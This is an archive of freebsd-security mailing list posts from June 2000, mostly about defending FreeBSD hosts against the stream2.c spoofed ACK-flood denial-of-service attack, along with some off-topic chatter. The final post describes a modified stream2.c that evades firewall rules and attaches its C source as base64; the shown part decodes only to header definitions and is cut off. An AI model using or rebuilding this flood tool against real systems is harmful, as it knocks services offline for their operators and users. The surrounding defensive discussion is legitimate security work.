Maks Maksimov mailto:maksim@tts.tomsk.su

From owner-freebsd-security Wed Jun 21 04:19:12 2000
From: Narvi
To: Joe Barnhart
Cc: Duncan de Verteuil, freebsd-isp@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: Resume...
Date: Wed, 21 Jun 2000 13:18:48 +0200 (EET)

*OH* *MY* *GOD*!!!

Why can't you people act more responsibly than the original poster and
**NOT** post it to lists it doesn't belong to, namely, -security and -isp?
This doesn't belong in either of the two.
On Tue, 20 Jun 2000, Joe Barnhart wrote:

> And people wonder why linux is getting so much more...it might just be
> because of the *attitudes* on the *bsd lists...
>
> This is but one of so many I have saved showing nothing but contempt for
> people. Oh well, keep being sound blaster compatible...you know, having
> support for linux apps instead of attracting the companies to write a
> direct port for you.
>
> Pitiful.
>
> JB

From owner-freebsd-security Wed Jun 21 07:56:34 2000
From: Brett Glass
To: "Maksimov Maksim", freebsd-security@FreeBSD.ORG
Subject: Re: How defend from stream2.c attack?
Date: Wed, 21 Jun 2000 08:55:53 -0600
Message-Id: <4.3.2.7.2.20000621085414.045fdaa0@localhost>
In-Reply-To: <000401bfdb64$3eae8320$0c3214d4@dragonland.tts.tomsk.su>

Have you turned on the kernel flag that restricts emission of RST
packets? I am not sure, but I think that Matt -- who is a stickler for
RFC compliance -- may have set things up so that one must recompile the
kernel before the flag will work.

--Brett

At 03:36 AM 6/21/2000, Maksimov Maksim wrote:

>How do I defend from a stream2.c attack (flooding ACK packets) on my FreeBSD box?
>I installed FreeBSD 4.0-20000608-STABLE, but the stream2.c attack froze this
>FreeBSD box as before!
>Help!
>
>Best regards,
>Maks Maksimov mailto:maksim@tts.tomsk.su

From owner-freebsd-security Wed Jun 21 08:33:24 2000
From: "Fast, Daniel H (Danny), SITS"
To: "'Narvi'", Joe Barnhart
Cc: Duncan de Verteuil, freebsd-isp@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: RE: Resume...
Date: Wed, 21 Jun 2000 10:32:48 -0500
Message-ID: <5D6D2EC6E987D31199EC00902799EC4A020A7BBF@mo3980po01.ems.att.com>

I have been holding back to respond.......but I will now.

This guy, the original poster of his Resume: it does not belong on the
list. I did not subscribe to a list to be shot marketing, nor am I
looking for employees [different sites/lists for that]. His enthusiasm,
cockiness, or skills are irrelevant; Gates/Linus could post his....and it
would still not be appropriate to the list [thumps fist to chest]. I am
sure he is a nice guy, just young...may or may not know better...now, can
the "RE: Resume" stuff stop?
Just my $1.50, anyone got change? :]

Danny

-----Original Message-----
From: Narvi [mailto:narvi@haldjas.folklore.ee]
Sent: Wednesday, June 21, 2000 04:19 AM
To: Joe Barnhart
Cc: Duncan de Verteuil; freebsd-isp@FreeBSD.ORG; freebsd-security@FreeBSD.ORG
Subject: Re: Resume...

*OH* *MY* *GOD*!!!

Why can't you people act more responsibly than the original poster and
**NOT** post it to lists it doesn't belong to, namely, -security and -isp?
This doesn't belong in either of the two.

On Tue, 20 Jun 2000, Joe Barnhart wrote:

> And people wonder why linux is getting so much more...it might just be
> because of the *attitudes* on the *bsd lists...
>
> This is but one of so many I have saved showing nothing but contempt for
> people. Oh well, keep being sound blaster compatible...you know, having
> support for linux apps instead of attracting the companies to write a
> direct port for you.
>
> Pitiful.
>
> JB

From owner-freebsd-security Wed Jun 21 08:36:24 2000
From: Brian Fundakowski Feldman
To: James Howard
Cc: freebsd-security@freebsd.org
Subject: Re: Network ACLs
Date: Wed, 21 Jun 2000 08:38:37 -0700 (PDT)
In-Reply-To: <200006202237.SAA20291@rac10.wam.umd.edu>

On Tue, 20 Jun 2000, James Howard wrote:

> I know that the TrustedBSD group is working on filesystem ACLs. Will
> something similar be extended to the socket interface?
Robert Watson and I were discussing this and ACLs in general over the
day, and yes, at one point, I will make sure that sockets have ACL
information. Basically, the information must be that it inherits the
parent's credentials, but right now the parent's credentials are still
ucred and not ACLs. It'll come along when ACLs become more pervasive,
perhaps after Poligraph is done if that is what it takes. We'll see :)

> Thanks, Jamie

--
 Brian Fundakowski Feldman           /  "Any sufficiently advanced bug is  \
 green@FreeBSD.org                   |  indistinguishable from a feature." |
 FreeBSD: The Power to Serve!        \        -- Rich Kulawiec             /

From owner-freebsd-security Wed Jun 21 08:47:31 2000
From: Bart van Leeuwen
To: Brett Glass
Cc: Maksimov Maksim, freebsd-security@freebsd.org
Subject: Re: How defend from stream2.c attack?
Date: Wed, 21 Jun 2000 17:51:19 +0200 (CEST)
In-Reply-To: <4.3.2.7.2.20000621085414.045fdaa0@localhost>

It looks like the assumption that you need to build a new kernel for
getting the option to limit sending out RSTs is correct. (the GENERIC
config file doesn't contain the options, and sysctl shows the vars
aren't there ;-)

You'll need to add the correct lines to the config file...
not just recompile, but I guess thats obvious to all except for a very inexperienced user. What I do wonder about however is if that option will help here. I can see how it would help against syn floods and maybe syn+ack floods. To me it seems like tis solves a bandwidth saturation problem, not a local freeze of the machine (tho it could because of just not running out of resources due to this restriction maybe). I'd be very interested to hear why it might help here to enhance my understanding of tcp/ip and fbsd's stack. btw, imho limiting RST on SYN+ACK might very well cause syn flooding another host when some bugger happens to use your IP as a decoy in an nmap scan for example. If nothing else works then you could always rate limit or drop those packets (or possible replies) with a statefull ipfw + dummynet ;-) Oh... which stream2.c do you mean? (I have a couple of files by that name on my system, and knowing which one you are talking about might help to provide you with a tested and much more concrete solution if there is any ;-) Bart van Leeuwen ----------------------------------------------------------- mailto:bart@ixori.demon.nl - http://www.ixori.demon.nl/ ----------------------------------------------------------- On Wed, 21 Jun 2000, Brett Glass wrote: > Have you turned on the kernel flag that restricts emission of > RST packets? I am not sure, but I think that Matt -- who is a > stickler for RFC compliance -- may have set things up so that > one must recompile the kernel before the flag will work. > > --Brett > > At 03:36 AM 6/21/2000, Maksimov Maksim wrote: > > >How defend from stream2.c attack (flooding ACK-packets) on my FreeBSD box? > >I install FreeBSD 4.0-20000608-STABLE, but stream2.c attack freezed this > >FreeBSD box as before! > >Help! 
> >
> >Best regards,
> >Maks Maksimov mailto:maksim@tts.tomsk.su

From owner-freebsd-security Wed Jun 21 9:15:20 2000
From: Mike Silbersack
To: Maksimov Maksim
Cc: freebsd-security@FreeBSD.ORG
Date: Wed, 21 Jun 2000 11:15:12 -0500 (CDT)
Subject: Re: How defend from stream2.c attack?
In-Reply-To: <000401bfdb64$3eae8320$0c3214d4@dragonland.tts.tomsk.su>

Is ICMP_BANDLIM enabled? If so, crank net.inet.icmp.icmplim down to 20 or so, and you should be just as protected as if enabling the restrict RST option.

(And if it's not compiled in, do so!)

Mike "Silby" Silbersack

On Wed, 21 Jun 2000, Maksimov Maksim wrote:

> How do I defend against a stream2.c attack (flooding ACK packets) on my FreeBSD box?
> I installed FreeBSD 4.0-20000608-STABLE, but the stream2.c attack froze this
> FreeBSD box as before!
> Help!
>
> Best regards,
> Maks Maksimov mailto:maksim@tts.tomsk.su

From owner-freebsd-security Wed Jun 21 10:02:49 2000
From: John F Cuzzola
To: Mike Silbersack
Cc: Maksimov Maksim, freebsd-security@FreeBSD.ORG
Date: Wed, 21 Jun 2000 10:02:35 -0700 (PDT)
Subject: Re: How defend from stream2.c attack?

Hi There,

Thanks for the information. I use a lot of FreeBSD servers as dedicated firewalls and as such am very interested in this kind of information. I have set net.inet.icmp.icmplim down to 20 (it was set at 200) as recommended and was wondering what exactly this variable does. Also, do you recommend compiling the kernel with the restrict RST option as well, and what are the implications of doing so? (i.e. what does it break?)

Thanks Mike (& everyone who contributes to this listserv)

On Wed, 21 Jun 2000, Mike Silbersack wrote:

> Is ICMP_BANDLIM enabled? If so, crank net.inet.icmp.icmplim down to 20 or
> so, and you should be just as protected as if enabling the restrict RST
> option.
>
> (And if it's not compiled in, do so!)
>
> Mike "Silby" Silbersack
>
> On Wed, 21 Jun 2000, Maksimov Maksim wrote:
>
> > How do I defend against a stream2.c attack (flooding ACK packets) on my FreeBSD box?
> > I installed FreeBSD 4.0-20000608-STABLE, but the stream2.c attack froze this
> > FreeBSD box as before!
> > Help!
> >
> > Best regards,
> > Maks Maksimov mailto:maksim@tts.tomsk.su

From owner-freebsd-security Wed Jun 21 12:03:44 2000
From: Brett Glass
To: Mike Silbersack, Maksimov Maksim
Cc: freebsd-security@FreeBSD.ORG
Date: Wed, 21 Jun 2000 13:03:07 -0600
Subject: Re: How defend from stream2.c attack?
Message-Id: <4.3.2.7.2.20000621125756.048b6d80@localhost>
References: <000401bfdb64$3eae8320$0c3214d4@dragonland.tts.tomsk.su>

At 10:15 AM 6/21/2000, Mike Silbersack wrote:

>Is ICMP_BANDLIM enabled? If so, crank net.inet.icmp.icmplim down to 20 or
>so, and you should be just as protected as if enabling the restrict RST
>option.

If it's an ACK flood, limiting RSTs is important because the response to an unexpected ACK is normally supposed to be a RST, not an ICMP packet.

The various "stream.c" exploits cause ICMP floods as well, but this is a secondary effect. The ICMP packets are triggered when RSTs from the attacked host(s) hit the upstream router and the spoofed addresses are detected. If there are fewer (or no) RSTs, there will not be an ICMP flood.

It's a good idea to turn on ICMP bandwidth limiting, RST restriction, and SYN+FIN dropping in your kernel configuration and rc.conf.

--Brett

From owner-freebsd-security Wed Jun 21 14:16:20 2000
From: "Anton A Chebotarev"
Date: Thu, 22 Jun 2000 01:13:32 +0400
Subject:
Message-ID: <00f601bfdbc5$91fed320$9601010a@incomsvyaz.ru>

(multipart/alternative message with no text body)

From owner-freebsd-security Wed Jun 21 14:23:05 2000
Date: Wed, 21 Jun 2000 22:29:15 +0100
From: User Datagram Protocol
To: "Fast, Daniel H (Danny), SITS"
Subject: Re: Resume...
Message-ID: <20000621222915.N95331@closed-networks.com>
In-Reply-To: <5D6D2EC6E987D31199EC00902799EC4A020A7BBF@mo3980po01.ems.att.com>
X-Echelon: MI6 Cobra GCHQ Panavia MI5 Timberline IRA NSA Mossad CIA Copperhead
Organization: Closed Networks, London, UK

Age will mature him. A polite reminder that this isn't the appropriate forum will be heeded, and he will modify his online social behavior patterns accordingly. There's no need to mock him or antagonise him, that's just negativity, but politeness is always a good thing. With time, yes, he may grow.

The whole question of 'operating system' seems irrelevant; this is a human/communication issue and one of developing a skill in adapting to particular social protocols to achieve life goals. The kid made a mistake, cut him some slack, remind him politely.

Live in peace and smile. :-)

On Wed, Jun 21, 2000 at 10:32:48AM -0500, Fast, Daniel H (Danny), SITS wrote:
> This guy, original poster of his Resume, it does not belong on the list.
> I did not subscribe to a list to be shot marketing nor am I looking for
> employees [different sites/lists for that].

--
Bruce M. Simpson aka 'udp'
Security Analyst & UNIX Development Engineer
WWW: www.closed-networks.com/~udp
     www.packetfactory.net/~udp
Dundee, United Kingdom
email: udp@closed-networks.com

From owner-freebsd-security Wed Jun 21 14:47:50 2000
Date: Wed, 21 Jun 2000 16:47:45 -0500 (CDT)
From: Mike Silbersack
To: Brett Glass
Cc: Maksimov Maksim, freebsd-security@FreeBSD.ORG
Subject: Re: How defend from stream2.c attack?
In-Reply-To: <4.3.2.7.2.20000621125756.048b6d80@localhost>

On Wed, 21 Jun 2000, Brett Glass wrote:

> At 10:15 AM 6/21/2000, Mike Silbersack wrote:
>
> >Is ICMP_BANDLIM enabled? If so, crank net.inet.icmp.icmplim down to 20 or
> >so, and you should be just as protected as if enabling the restrict RST
> >option.
>
> If it's an ACK flood, limiting RSTs is important because the response to
> an unexpected ACK is normally supposed to be a RST, not an ICMP packet.

ICMP_BANDLIM isn't a totally correct name, actually. It currently causes ICMP unreachables _and_ RST packets to be rate limited.

> The various "stream.c" exploits cause ICMP floods as well, but this is
> a secondary effect.
>
> The ICMP packets are triggered when RSTs from the attacked host(s) hit the
> upstream router and the spoofed addresses are detected. If there are fewer
> (or no) RSTs, there will not be an ICMP flood.
>
> It's a good idea to turn on ICMP bandwidth limiting, RST restriction, and
> SYN+FIN dropping in your kernel configuration and rc.conf.

Given that ICMP_BANDLIM rate limits RST, it's probably better to turn on ICMP_BANDLIM and set the threshold to something in the sub-50 range. I guess if you're not using T/TCP (which I doubt anyone is anyway), turning on SYN+FIN dropping isn't a bad idea either.

However, I'm still puzzled by the original poster's problem; from the results Matt/others posted when the other stream related fixes were applied, I was under the impression that you'd still be more than OK with the default setting of 200. I don't think a freeze should result.

Mike "Silby" Silbersack

From owner-freebsd-security Wed Jun 21 15:00:19 2000
Date: Wed, 21 Jun 2000 23:08:48 +0100
From: User Datagram Protocol
To: Dean Brundage
Cc: freebsd-security@freebsd.org
Subject: Re: Resume...
Message-ID: <20000621230848.O95331@closed-networks.com>
In-Reply-To: <200006212150.OAA14265@ha1mil.EBay.Sun.COM>
X-Echelon: MI6 Cobra GCHQ Panavia MI5 Timberline IRA NSA Mossad CIA Copperhead
Organization: Closed Networks, London, UK

On Wed, Jun 21, 2000 at 02:50:59PM -0700, Dean Brundage wrote:
> >X-Echelon: MI6 Cobra GCHQ Panavia MI5 Timberline IRA NSA Mossad CIA Copperhead
> >X-Loop: FreeBSD.org
>
> How do you get that X-Echelon line in your mail headers?
> Thanks,

Mutt my_hdr command. I haven't scripted it yet, so it's fixed and doesn't change every time. I really want to get some higher precedence keywords in there, maybe create an agent which scans CNN/NBC/CBS/Reuters/AP and comes up with keywords which are likely to trigger Echelon filters.

"Through waves they shift / Below they hide / Corporate killers / Side by side
Process this signal / Final post / Global Defiance / No hope for most
Inform of liquid / Sliding through air / Tracking this existence / Killer hardware"
-- Front Line Assembly, 'Circuitry', Hard Wired, 1995 (SPV)

--
Bruce M. Simpson aka 'udp'
Security Analyst & UNIX Development Engineer
WWW: www.closed-networks.com/~udp
     www.packetfactory.net/~udp
Dundee, United Kingdom
email: udp@closed-networks.com

From owner-freebsd-security Wed Jun 21 15:28:43 2000
Date: Wed, 21 Jun 2000 17:28:37 -0500 (CDT)
From: Mike Silbersack
To: John F Cuzzola
Cc: Maksimov Maksim, freebsd-security@FreeBSD.ORG
Subject: Re: How defend from stream2.c attack?

On Wed, 21 Jun 2000, John F Cuzzola wrote:

> Hi There,
> Thanks for the information. I use a lot of FreeBSD servers as dedicated
> firewalls and as such am very interested in this kind of information. I
> have set net.inet.icmp.icmplim down to 20 (it was set at 200) as
> recommended and was wondering what exactly this variable does. Also, do
> you recommend compiling the kernel with the restrict RST option as well,
> and what are the implications of doing so? (i.e. what does it break?)

Well, in short, RSTs are sent in response to unexpected packets, such as those that arrive when someone's attacking your box in certain manners, or in response to connections to ports which aren't open. They're not much needed, which is why you can get away with totally eliminating the sending of them as Brett suggests. However, just to be more polite in the case that a legitimate misconnection is made, it's better to leave them enabled.

As for what's an appropriate setting for the maximum number to send per second... how many bad connections do you expect to be made to your system per second?

Mike "Silby" Silbersack

From owner-freebsd-security Wed Jun 21 17:16:10 2000
From: Don Lewis
To: Brett Glass, Mike Silbersack, Maksimov Maksim
Cc: freebsd-security@FreeBSD.ORG
Date: Wed, 21 Jun 2000 17:15:46 -0700
Subject: Re: How defend from stream2.c attack?
Message-Id: <200006220015.RAA05962@salsa.gv.tsc.tdk.com>
In-Reply-To: <4.3.2.7.2.20000621125756.048b6d80@localhost>

On Jun 21, 1:03pm, Brett Glass wrote:
} Subject: Re: How defend from stream2.c attack?
} At 10:15 AM 6/21/2000, Mike Silbersack wrote:
}
} >Is ICMP_BANDLIM enabled? If so, crank net.inet.icmp.icmplim down to 20 or
} >so, and you should be just as protected as if enabling the restrict RST
} >option.
}
} If it's an ACK flood, limiting RSTs is important because the response to
} an unexpected ACK is normally supposed to be a RST, not an ICMP packet.
}
} The various "stream.c" exploits cause ICMP floods as well, but this is
} a secondary effect.
}
} The ICMP packets are triggered when RSTs from the attacked host(s) hit the
} upstream router and the spoofed addresses are detected. If there are fewer
} (or no) RSTs, there will not be an ICMP flood.
}
} It's a good idea to turn on ICMP bandwidth limiting, RST restriction, and
} SYN+FIN dropping in your kernel configuration and rc.conf.

Turning on the RST restriction makes it much easier to spoof TCP connections that appear to come from your machine or to hijack established TCP connections. Also, if your machine crashes and reboots, any TCP connections that were established before the crash won't get torn down until they time out (incoming telnet sessions will just hang, and you may not be able to reestablish new outgoing connections if the same port number gets reused).

There's nothing an attacker can do with a SYN+FIN attack that can't be done by just sending SYN packets. Disabling SYN+FIN breaks T/TCP.

From owner-freebsd-security Wed Jun 21 17:24:36 2000
From: Don Lewis
To: "Maksimov Maksim"
Date: Wed, 21 Jun 2000 17:24:29 -0700
Subject: Re: How defend from stream2.c attack?
Message-Id: <200006220024.RAA05975@salsa.gv.tsc.tdk.com>
In-Reply-To: <000401bfdb64$3eae8320$0c3214d4@dragonland.tts.tomsk.su>

On Jun 21, 5:36pm, "Maksimov Maksim" wrote:
} Subject: How defend from stream2.c attack?
} How do I defend against a stream2.c attack (flooding ACK packets) on my FreeBSD box?
} I installed FreeBSD 4.0-20000608-STABLE, but the stream2.c attack froze this
} FreeBSD box as before!

This version of FreeBSD should be fairly immune to the standard stream2.c attack (even without ICMP_BANDLIM, which I would recommend using). It seems the biggest part of the problem was caused by the incoming packets which had IP addresses in the multicast range. We tweaked tcp_input() so that these get ignored. We didn't do anything about broadcast source addresses, so if you are attacked by a variant of stream2 that uses these you could still have problems. I would recommend adding packet filter rules that block incoming packets with IP broadcast addresses, both 255.255.255.255 and the broadcast address(es) of your local network(s).

From owner-freebsd-security Wed Jun 21 21:27:44 2000
From: "Maksimov Maksim"
Date: Thu, 22 Jun 2000 12:27:30 +0800
Subject: How defend from stream2.c attack?
Message-ID: <001e01bfdc02$2ec3ea60$0c3214d4@dragonland.tts.tomsk.su>

I inserted these lines in my kernel config file:

    options ICMP_BANDLIM
    options TCP_DROP_SYNFIN    #drop TCP packets with SYN+FIN
    options TCP_RESTRICT_RST   #restrict emission of TCP RST

and inserted these lines in my rc.conf file:

    tcp_keepalive="YES"        # Enable stale TCP connection timeout (or NO).
    tcp_drop_synfin="YES"      # Set to YES to drop TCP packets with SYN+FIN
                               # NOTE: this violates the TCP specification
    tcp_restrict_rst="YES"     # Set to YES to restrict emission of RST
    icmp_drop_redirect="YES"   # Set to YES to ignore ICMP REDIRECT packets
    icmp_log_redirect="NO"     # Set to YES to log ICMP REDIRECT packets
    icmp_bmcastecho="NO"       # respond to broadcast ping packets

and recompiled my kernel, rebooted my computer, set net.inet.icmp.icmplim down to 20, and added rules to my firewall (I use IPFilter 3.4.6):

    block in quick on ed0 from any to 255.255.255.255
    block in quick on ed0 from any to my.local.subnet.255

BUT the stream2.c attack froze my FreeBSD 4.0-20000608-STABLE as before!!!
Best regards,
Maks Maksimov mailto:maksim@tts.tomsk.su

From owner-freebsd-security Wed Jun 21 21:34:21 2000
From: Will Andrews
To: Maksimov Maksim
Cc: freebsd-security@FreeBSD.ORG
Date: Thu, 22 Jun 2000 00:31:51 -0400
Subject: Re: How defend from stream2.c attack?
Message-ID: <20000622003151.H47446@argon.gryphonsoft.com>
In-Reply-To: <001e01bfdc02$2ec3ea60$0c3214d4@dragonland.tts.tomsk.su>

On Thu, Jun 22, 2000 at 12:27:30PM +0800, Maksimov Maksim wrote:
> BUT the stream2.c attack froze my FreeBSD 4.0-20000608-STABLE as before!!!

You'll have to post the source code for the best defense proposal.

--
Will Andrews

From owner-freebsd-security Wed Jun 21 23:49:41 2000
Date: Thu, 22 Jun 2000 08:48:40 +0200
Message-ID: <3951B6C8.DA609831@mics.co.za>
From: Christiaan Rademan
Organization: MICS
X-Mailer: Mozilla 4.72 [en] (X11; I; FreeBSD 4.0-STABLE i386)
To: freebsd-security@freebsd.org
Subject: Hi All.

Greetings..

We here have a FreeBSD 4.0-Stable server, running latest services, i.e. for mail. The problem is it has been rebooting from time to time.. No reason has been given to me in detail via the log file. The machine has definitely not been hacked according to some probes.

I am left with a question: "Did I break something, or is there a new DoS attack or something else?"

All I have done is changed the chflags on some odd directories /bin with -R. Directories: /bin - /sbin - /usr/bin - /usr/sbin - /usr/libexec

Then I mostly went around removing +x filemodes from some slightly important suid exec, but they're still executable by owner,group : root,wheel.

Other than that, the server has definitely not got hardware problems; that has been replaced fully. I also have the system running kern.securelevel=3... via rc.conf

I successfully had a machine running with uptime for over 60 days, with the changes. Although now I have to question why the machine reboots during the week? So far, it looks like the kernel is screwing up, for no known reason. I am about to try running the machine on a generic kernel, maybe make an attempt to see if it still breaks.

If anyone has a clue what might be going wrong here, please contact me..

Regards,
Christiaan Rademan

From owner-freebsd-security Thu Jun 22 1:50:33 2000
From: "Tim McCullagh"
To: "Christiaan Rademan"
Date: Thu, 22 Jun 2000 18:52:30 +1000
Subject: Re: Hi All.
Message-ID: <00eb01bfdc27$35e50520$778d25cb@halenet.com.au>
References: <3951B6C8.DA609831@mics.co.za>

Hi Christiaan,

I am having the same problem. I posted a message to the ISP list a couple of days ago and it seems as if a number of people are having the same problem.. It has been suggested that I should compile a custom kernel to get around it. Some of the responses have suggested going back to 3.4 rather than 4.0. So I don't think you have any sort of DOS. It would seem there is an issue with 4.0 which affects some of us.

Let us know if you find anything. I will do the same.

regards

Tim

----- Original Message -----
From owner-freebsd-security Thu Jun 22 2:31:15 2000
Delivered-To: freebsd-security@freebsd.org
Received: from adm.sci-nnov.ru (adm.sci-nnov.ru [195.122.226.2]) by hub.freebsd.org (Postfix) with ESMTP id D931337C21D for ; Thu, 22 Jun 2000 02:30:53 -0700 (PDT) (envelope-from 3APA3A@SECURITY.NNOV.RU)
Received: from anonymous.sandy.ru (anonymous.sandy.ru [195.122.226.40]) by adm.sci-nnov.ru (8.9.3/Dmiter-4.1-AGK-0.3) with ESMTP id NAA89563; Thu, 22 Jun 2000 13:24:18 +0400 (MSD)
Content-Transfer-Encoding: 8bit
Date: Thu, 22 Jun 2000 13:24:21 +0400
From: 3APA3A <3APA3A@SECURITY.NNOV.RU>
X-Mailer: The Bat! (v1.41)
Reply-To: 3APA3A <3APA3A@SECURITY.NNOV.RU>
Organization: Sandy Info
X-Priority: 3 (Normal)
Message-ID: <10558.000622@sandy.ru>
To: "Maksimov Maksim" ,
Subject: Re: How defend from stream2.c attack? (Fwd: Re[2]: explanation and code for stream.c issues)
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="----------4B7E20EB2F02F8"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

------------4B7E20EB2F02F8
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

To remind what stream2.c is. I wonder whether it is still working after disabling RST, but maybe it's because of combining SYN packets with invalid ACK packets. Maybe it's just another kind of attack and it's not connected with flood. My recommendation on blocking this attack is to limit the number of packets in a unit of time, as shown below. But it is still not tested :(

http://www.security.nnov.ru
3APA3A
You know my name - look up my number (The Beatles)

This is a forwarded message
From: Vladimir Dubrovin
To: Tim Yardley
Subject: explanation and code for stream.c issues

===8<==============Original message text===============

21.01.00 22:15, you wrote: explanation and code for stream.c issues;

>>T> -- start rule set --
>>T> block in quick proto tcp from any to any head 100
>>T> pass in quick proto tcp from any to any flags S keep state group 100
>>T> pass in all
>>T> -- end rule set --
>>
>>Attack can be easily changed to send pair SYN and invalid SYN/ACK

My mistake here - the SYN/ACK packet isn't required. Sorry, I wrote this message after 11 hours of work. The intruder sends a SYN packet and then sends, let's say, 1000 ACK packets to the same port from the same port and source address. The SYN packet will open ipfilter to pass all other packets. This attack doesn't need randomization for each packet.

By the way - the published stream.c doesn't use the ACK bit at all.

packet.tcp.th_flags = 0;

It looks like a usual flooder and can be easily filtered with ipfw by blocking packets without any flags set (these packets are invalid for TCP).

allow tcp from any to any tcpflags ack
allow tcp from any to any tcpflags syn
allow tcp from any to any tcpflags syn,ack
allow tcp from any to any tcpflags rst
...
deny tcp from any to any

Attached is a patched stream.c which sends (SYN packet + 1023 ACK packets) from a random port and source. This ipfw rule and the published ipfilter rule will be unusable against this attack. In my current location I can't test it.

T> As was mentioned in the "advisory/explanation" on the issue, ipfw cannot
T> deal with the problem due to the fact that it is stateless.

T> The attack comes from random ip addresses, therefore throttling like that
T> only hurts your connection or solves nothing at all. In other words, the
T> random sourcing and method of the attack, makes a non-stateless firewall
T> useless.

It would be better if you read the rule before answering. Of course, ipfw can't find invalid ACK packets.
But if the OS supports the DUMMYNET option, ipfw can be used to limit the number of packets in a fixed amount of time. In this case:

ipfw pipe 10 config delay 50 queue 500 packets
ipfw add pipe 10 tcp from any to $MYHOST in via $EXTERNAL

we limit the router to allow only 500 TCP packets in every 50ms. The average size of a TCP packet is approx. 500 bytes (you can test it). So, you allow bandwidth of 40 Mbps for standard TCP traffic. But this rule will effectively block any spoofing attack which uses small packets. If 50-byte packets are used this rule will allow only a bandwidth of 4 Mbps for such an attack. Not only the "ACK" attack, but any flood. We didn't check source, so we're safe against any spoofing. Of course in this case you will lose TCP packets during an attack and connections can be dropped, but at least your host will be safe.

As it was pointed out, _any_ packet filter, including ipfilter, can't solve this problem completely.

+=-=-=-=-=-=-=-=-=+
|Vladimir Dubrovin|
| Sandy Info, ISP |
+=-=-=-=-=-=-=-=-=+

===8<===========End of original message text===========

------------4B7E20EB2F02F8
Content-Type: application/octet-stream; name="stream2.c"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="stream2.c"

I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RkbGliLmg+DQojaW5jbHVkZSA8dW5pc3Rk Lmg+DQojaW5jbHVkZSA8c3RyaW5ncy5oPg0KI2luY2x1ZGUgPHN5cy90aW1lLmg+DQojaW5jbHVk ZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2lmbmRlZiBfX1VTRV9C U0QNCiNkZWZpbmUgX19VU0VfQlNEDQojZW5kaWYNCiNpZm5kZWYgX19GQVZPUl9CU0QNCiNkZWZp bmUgX19GQVZPUl9CU0QNCiNlbmRpZg0KI2luY2x1ZGUgPG5ldGluZXQvaW5fc3lzdG0uaD4NCiNp bmNsdWRlIDxuZXRpbmV0L2luLmg+DQojaW5jbHVkZSA8bmV0aW5ldC9pcC5oPg0KI2luY2x1ZGUg PG5ldGluZXQvdGNwLmg+DQojaW5jbHVkZSA8YXJwYS9pbmV0Lmg+DQojaW5jbHVkZSA8bmV0ZGIu aD4NCg0KI2lmZGVmIExJTlVYDQojZGVmaW5lIEZJWCh4KSAgaHRvbnMoeCkNCiNlbHNlDQojZGVm aW5lIEZJWCh4KSAgKHgpDQojZW5kaWYNCg0Kc3RydWN0IGlwX2hkciB7DQogICAgdV9pbnQgICAg ICAgaXBfaGw6NCwgICAgICAgICAgICAgICAgLyogaGVhZGVyIGxlbmd0aCBpbiAzMiBiaXQgd29y
ZHMgKi8NCiAgICAgICAgICAgICAgICBpcF92OjQ7ICAgICAgICAgICAgICAgICAvKiBpcCB2ZXJz aW9uICovDQogICAgdV9jaGFyICAgICAgaXBfdG9zOyAgICAgICAgICAgICAgICAgLyogdHlwZSBv ZiBzZXJ2aWNlICovDQogICAgdV9zaG9ydCAgICAgaXBfbGVuOyAgICAgICAgICAgICAgICAgLyog dG90YWwgcGFja2V0IGxlbmd0aCAqLw0KICAgIHVfc2hvcnQgICAgIGlwX2lkOyAgICAgICAgICAg ICAgICAgIC8qIGlkZW50aWZpY2F0aW9uICovDQogICAgdV9zaG9ydCAgICAgaXBfb2ZmOyAgICAg ICAgICAgICAgICAgLyogZnJhZ21lbnQgb2Zmc2V0ICovDQogICAgdV9jaGFyICAgICAgaXBfdHRs OyAgICAgICAgICAgICAgICAgLyogdGltZSB0byBsaXZlICovDQogICAgdV9jaGFyICAgICAgaXBf cDsgICAgICAgICAgICAgICAgICAgLyogcHJvdG9jb2wgKi8NCiAgICB1X3Nob3J0ICAgICBpcF9z dW07ICAgICAgICAgICAgICAgICAvKiBpcCBjaGVja3N1bSAqLw0KICAgIHVfbG9uZyAgICAgIHNh ZGRyLCBkYWRkcjsgICAgICAgICAgIC8qIHNvdXJjZSBhbmQgZGVzdCBhZGRyZXNzICovDQp9Ow0K DQpzdHJ1Y3QgdGNwX2hkciB7DQogICAgdV9zaG9ydCAgICAgdGhfc3BvcnQ7ICAgICAgICAgICAg ICAgLyogc291cmNlIHBvcnQgKi8NCiAgICB1X3Nob3J0ICAgICB0aF9kcG9ydDsgICAgICAgICAg ICAgICAvKiBkZXN0aW5hdGlvbiBwb3J0ICovDQogICAgdV9sb25nICAgICAgdGhfc2VxOyAgICAg ICAgICAgICAgICAgLyogc2VxdWVuY2UgbnVtYmVyICovDQogICAgdV9sb25nICAgICAgdGhfYWNr OyAgICAgICAgICAgICAgICAgLyogYWNrbm93bGVkZ2VtZW50IG51bWJlciAqLw0KICAgIHVfaW50 ICAgICAgIHRoX3gyOjQsICAgICAgICAgICAgICAgIC8qIHVudXNlZCAqLw0KICAgICAgICAgICAg ICAgIHRoX29mZjo0OyAgICAgICAgICAgICAgIC8qIGRhdGEgb2Zmc2V0ICovDQogICAgdV9jaGFy ICAgICAgdGhfZmxhZ3M7ICAgICAgICAgICAgICAgLyogZmxhZ3MgZmllbGQgKi8NCiAgICB1X3No b3J0ICAgICB0aF93aW47ICAgICAgICAgICAgICAgICAvKiB3aW5kb3cgc2l6ZSAqLw0KICAgIHVf c2hvcnQgICAgIHRoX3N1bTsgICAgICAgICAgICAgICAgIC8qIHRjcCBjaGVja3N1bSAqLw0KICAg IHVfc2hvcnQgICAgIHRoX3VycDsgICAgICAgICAgICAgICAgIC8qIHVyZ2VudCBwb2ludGVyICov DQp9Ow0KDQpzdHJ1Y3QgdGNwb3B0X2hkciB7DQogICAgdV9jaGFyICB0eXBlOyAgICAgICAgICAg ICAgICAgICAgICAgLyogdHlwZSAqLw0KICAgIHVfY2hhciAgbGVuOyAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgLyogbGVuZ3RoICovDQogICAgdV9zaG9ydCB2YWx1ZTsgICAgICAgICAg 